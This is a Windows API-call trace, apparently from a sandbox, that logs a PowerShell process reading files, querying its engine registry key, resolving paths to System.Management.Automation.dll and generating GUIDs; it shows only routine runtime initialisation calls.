	[0500.958] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.958] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.958] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.958] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.958] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.959] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.959] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.959] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.959] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.959] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.959] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.959] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0xf37, lpOverlapped=0x0) returned 1
	[0500.960] ReadFile (in: hFile=0x320, lpBuffer=0x2f9a347, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9a347*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0500.960] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0500.960] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x320) returned 0x0
	[0500.960] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0500.960] CoTaskMemAlloc (cb=0x5a) returned 0x4541e0
	[0500.960] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x4541e0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0500.960] CoTaskMemFree (pv=0x4541e0) 
	[0500.960] RegCloseKey (hKey=0x320) returned 0x0
	[0500.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0500.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0500.964] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x8923f484, Data2=0x9773, Data3=0x4cf6, Data4=([0]=0xa7, [1]=0xb, [2]=0xf8, [3]=0xc4, [4]=0x81, [5]=0x41, [6]=0xa8, [7]=0xf8))) returned 0x0
	[0500.965] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xcedfe263, Data2=0xd587, Data3=0x4779, Data4=([0]=0xa9, [1]=0x19, [2]=0x12, [3]=0xc3, [4]=0xd5, [5]=0xbb, [6]=0x45, [7]=0x80))) returned 0x0
	[0501.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.550] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3d68997c, Data2=0xafa0, Data3=0x4c4a, Data4=([0]=0x88, [1]=0xc, [2]=0x81, [3]=0x89, [4]=0xd0, [5]=0x6e, [6]=0xc6, [7]=0x7))) returned 0x0
	[0501.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.554] VirtualQuery (in: lpAddress=0x1ab5a0, lpBuffer=0x1ac460, dwLength=0x30 | out: lpBuffer=0x1ac460*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0501.555] VirtualQuery (in: lpAddress=0x1ab630, lpBuffer=0x1ac4f0, dwLength=0x30 | out: lpBuffer=0x1ac4f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0501.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.557] VirtualQuery (in: lpAddress=0x1abdb0, lpBuffer=0x1acc70, dwLength=0x30 | out: lpBuffer=0x1acc70*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0501.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.558] VirtualQuery (in: lpAddress=0x1abdb0, lpBuffer=0x1acc70, dwLength=0x30 | out: lpBuffer=0x1acc70*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0501.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0501.561] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xd229e9ce, Data2=0xdf69, Data3=0x4e3b, Data4=([0]=0x85, [1]=0x93, [2]=0x7b, [3]=0x93, [4]=0xa2, [5]=0xf3, [6]=0xe5, [7]=0x6d))) returned 0x0
	[0501.562] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x8e3d78a5, Data2=0xc261, Data3=0x48ff, Data4=([0]=0xb6, [1]=0x33, [2]=0xb8, [3]=0x70, [4]=0x9b, [5]=0xe3, [6]=0xd3, [7]=0x4c))) returned 0x0
	[0501.563] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xe7e2dc63, Data2=0x6da, Data3=0x4ee5, Data4=([0]=0xb9, [1]=0x29, [2]=0x3b, [3]=0x6e, [4]=0x93, [5]=0x1c, [6]=0x22, [7]=0x7))) returned 0x0
	[0501.577] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x6b81612d, Data2=0xa64b, Data3=0x4e26, Data4=([0]=0xb8, [1]=0xc0, [2]=0xc3, [3]=0x2d, [4]=0x53, [5]=0x4d, [6]=0xe6, [7]=0x96))) returned 0x0
	[0501.577] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x42fef3e4, Data2=0xa408, Data3=0x47e1, Data4=([0]=0x8d, [1]=0xce, [2]=0x96, [3]=0xbd, [4]=0xdb, [5]=0xd7, [6]=0xd6, [7]=0x2f))) returned 0x0
	[0501.578] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x400bc269, Data2=0x6db6, Data3=0x43f7, Data4=([0]=0xa1, [1]=0xc8, [2]=0xe0, [3]=0x90, [4]=0xe4, [5]=0x5e, [6]=0x68, [7]=0xce))) returned 0x0
	[0501.578] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x98666604, Data2=0xbf31, Data3=0x4ee4, Data4=([0]=0x95, [1]=0x3c, [2]=0x40, [3]=0xd9, [4]=0xd, [5]=0x7, [6]=0xcf, [7]=0x4))) returned 0x0
	[0501.578] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xaf89e1f9, Data2=0x49e2, Data3=0x4b75, Data4=([0]=0xb8, [1]=0x95, [2]=0xe5, [3]=0xcc, [4]=0xb7, [5]=0x81, [6]=0x31, [7]=0xfa))) returned 0x0
	[0501.578] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x9abefbb5, Data2=0x8a30, Data3=0x490e, Data4=([0]=0xbe, [1]=0xce, [2]=0xfc, [3]=0x62, [4]=0x1e, [5]=0x19, [6]=0x1c, [7]=0x61))) returned 0x0
	[0501.578] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xaad4a9f0, Data2=0x8c7c, Data3=0x4f46, Data4=([0]=0x8e, [1]=0xc9, [2]=0xc2, [3]=0xb1, [4]=0xf, [5]=0x59, [6]=0x54, [7]=0x77))) returned 0x0
	[0501.578] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3d8f01b2, Data2=0x82e, Data3=0x4f4b, Data4=([0]=0x8d, [1]=0xdb, [2]=0xc1, [3]=0x91, [4]=0x68, [5]=0x35, [6]=0xae, [7]=0xe6))) returned 0x0
	[0501.578] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xcdc588c3, Data2=0x6aea, Data3=0x4a95, Data4=([0]=0xb1, [1]=0xdb, [2]=0xa6, [3]=0x28, [4]=0x36, [5]=0x7, [6]=0xab, [7]=0x6b))) returned 0x0
	[0501.579] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x58f475ed, Data2=0xb035, Data3=0x479b, Data4=([0]=0xa9, [1]=0xab, [2]=0x3e, [3]=0x3e, [4]=0xed, [5]=0x7f, [6]=0x84, [7]=0x9e))) returned 0x0
	[0501.580] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xbeb8bdea, Data2=0x7577, Data3=0x4692, Data4=([0]=0x83, [1]=0xbf, [2]=0x80, [3]=0x6e, [4]=0x1b, [5]=0xfb, [6]=0xbd, [7]=0x9c))) returned 0x0
	[0501.580] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xf19323b6, Data2=0xdd3b, Data3=0x4a44, Data4=([0]=0xbc, [1]=0x5d, [2]=0x7a, [3]=0x8f, [4]=0x72, [5]=0x38, [6]=0x65, [7]=0x66))) returned 0x0
	[0501.581] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3201d68e, Data2=0x4fdd, Data3=0x4fe2, Data4=([0]=0xa5, [1]=0x8e, [2]=0x33, [3]=0x4f, [4]=0x9f, [5]=0x8b, [6]=0xc8, [7]=0x2e))) returned 0x0
	[0501.581] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xeaa5417, Data2=0x7c41, Data3=0x4bd7, Data4=([0]=0xbd, [1]=0x3d, [2]=0x18, [3]=0x57, [4]=0x21, [5]=0xcb, [6]=0x52, [7]=0x2e))) returned 0x0
	[0501.581] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x6228f2f8, Data2=0x708f, Data3=0x40a0, Data4=([0]=0x9a, [1]=0x19, [2]=0xaf, [3]=0x69, [4]=0x82, [5]=0x7c, [6]=0xf1, [7]=0x46))) returned 0x0
	[0501.581] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xcc4187f3, Data2=0xf7fe, Data3=0x489b, Data4=([0]=0xaa, [1]=0xc5, [2]=0xfb, [3]=0xe, [4]=0x68, [5]=0xa, [6]=0x6b, [7]=0x42))) returned 0x0
	[0501.581] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3d895934, Data2=0xc953, Data3=0x4158, Data4=([0]=0x9c, [1]=0x3c, [2]=0x9c, [3]=0xa0, [4]=0xb2, [5]=0x46, [6]=0xee, [7]=0x23))) returned 0x0
	[0501.582] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xa834b394, Data2=0x3041, Data3=0x4748, Data4=([0]=0x81, [1]=0x9a, [2]=0x3f, [3]=0xb, [4]=0x68, [5]=0xd1, [6]=0x8c, [7]=0x5))) returned 0x0
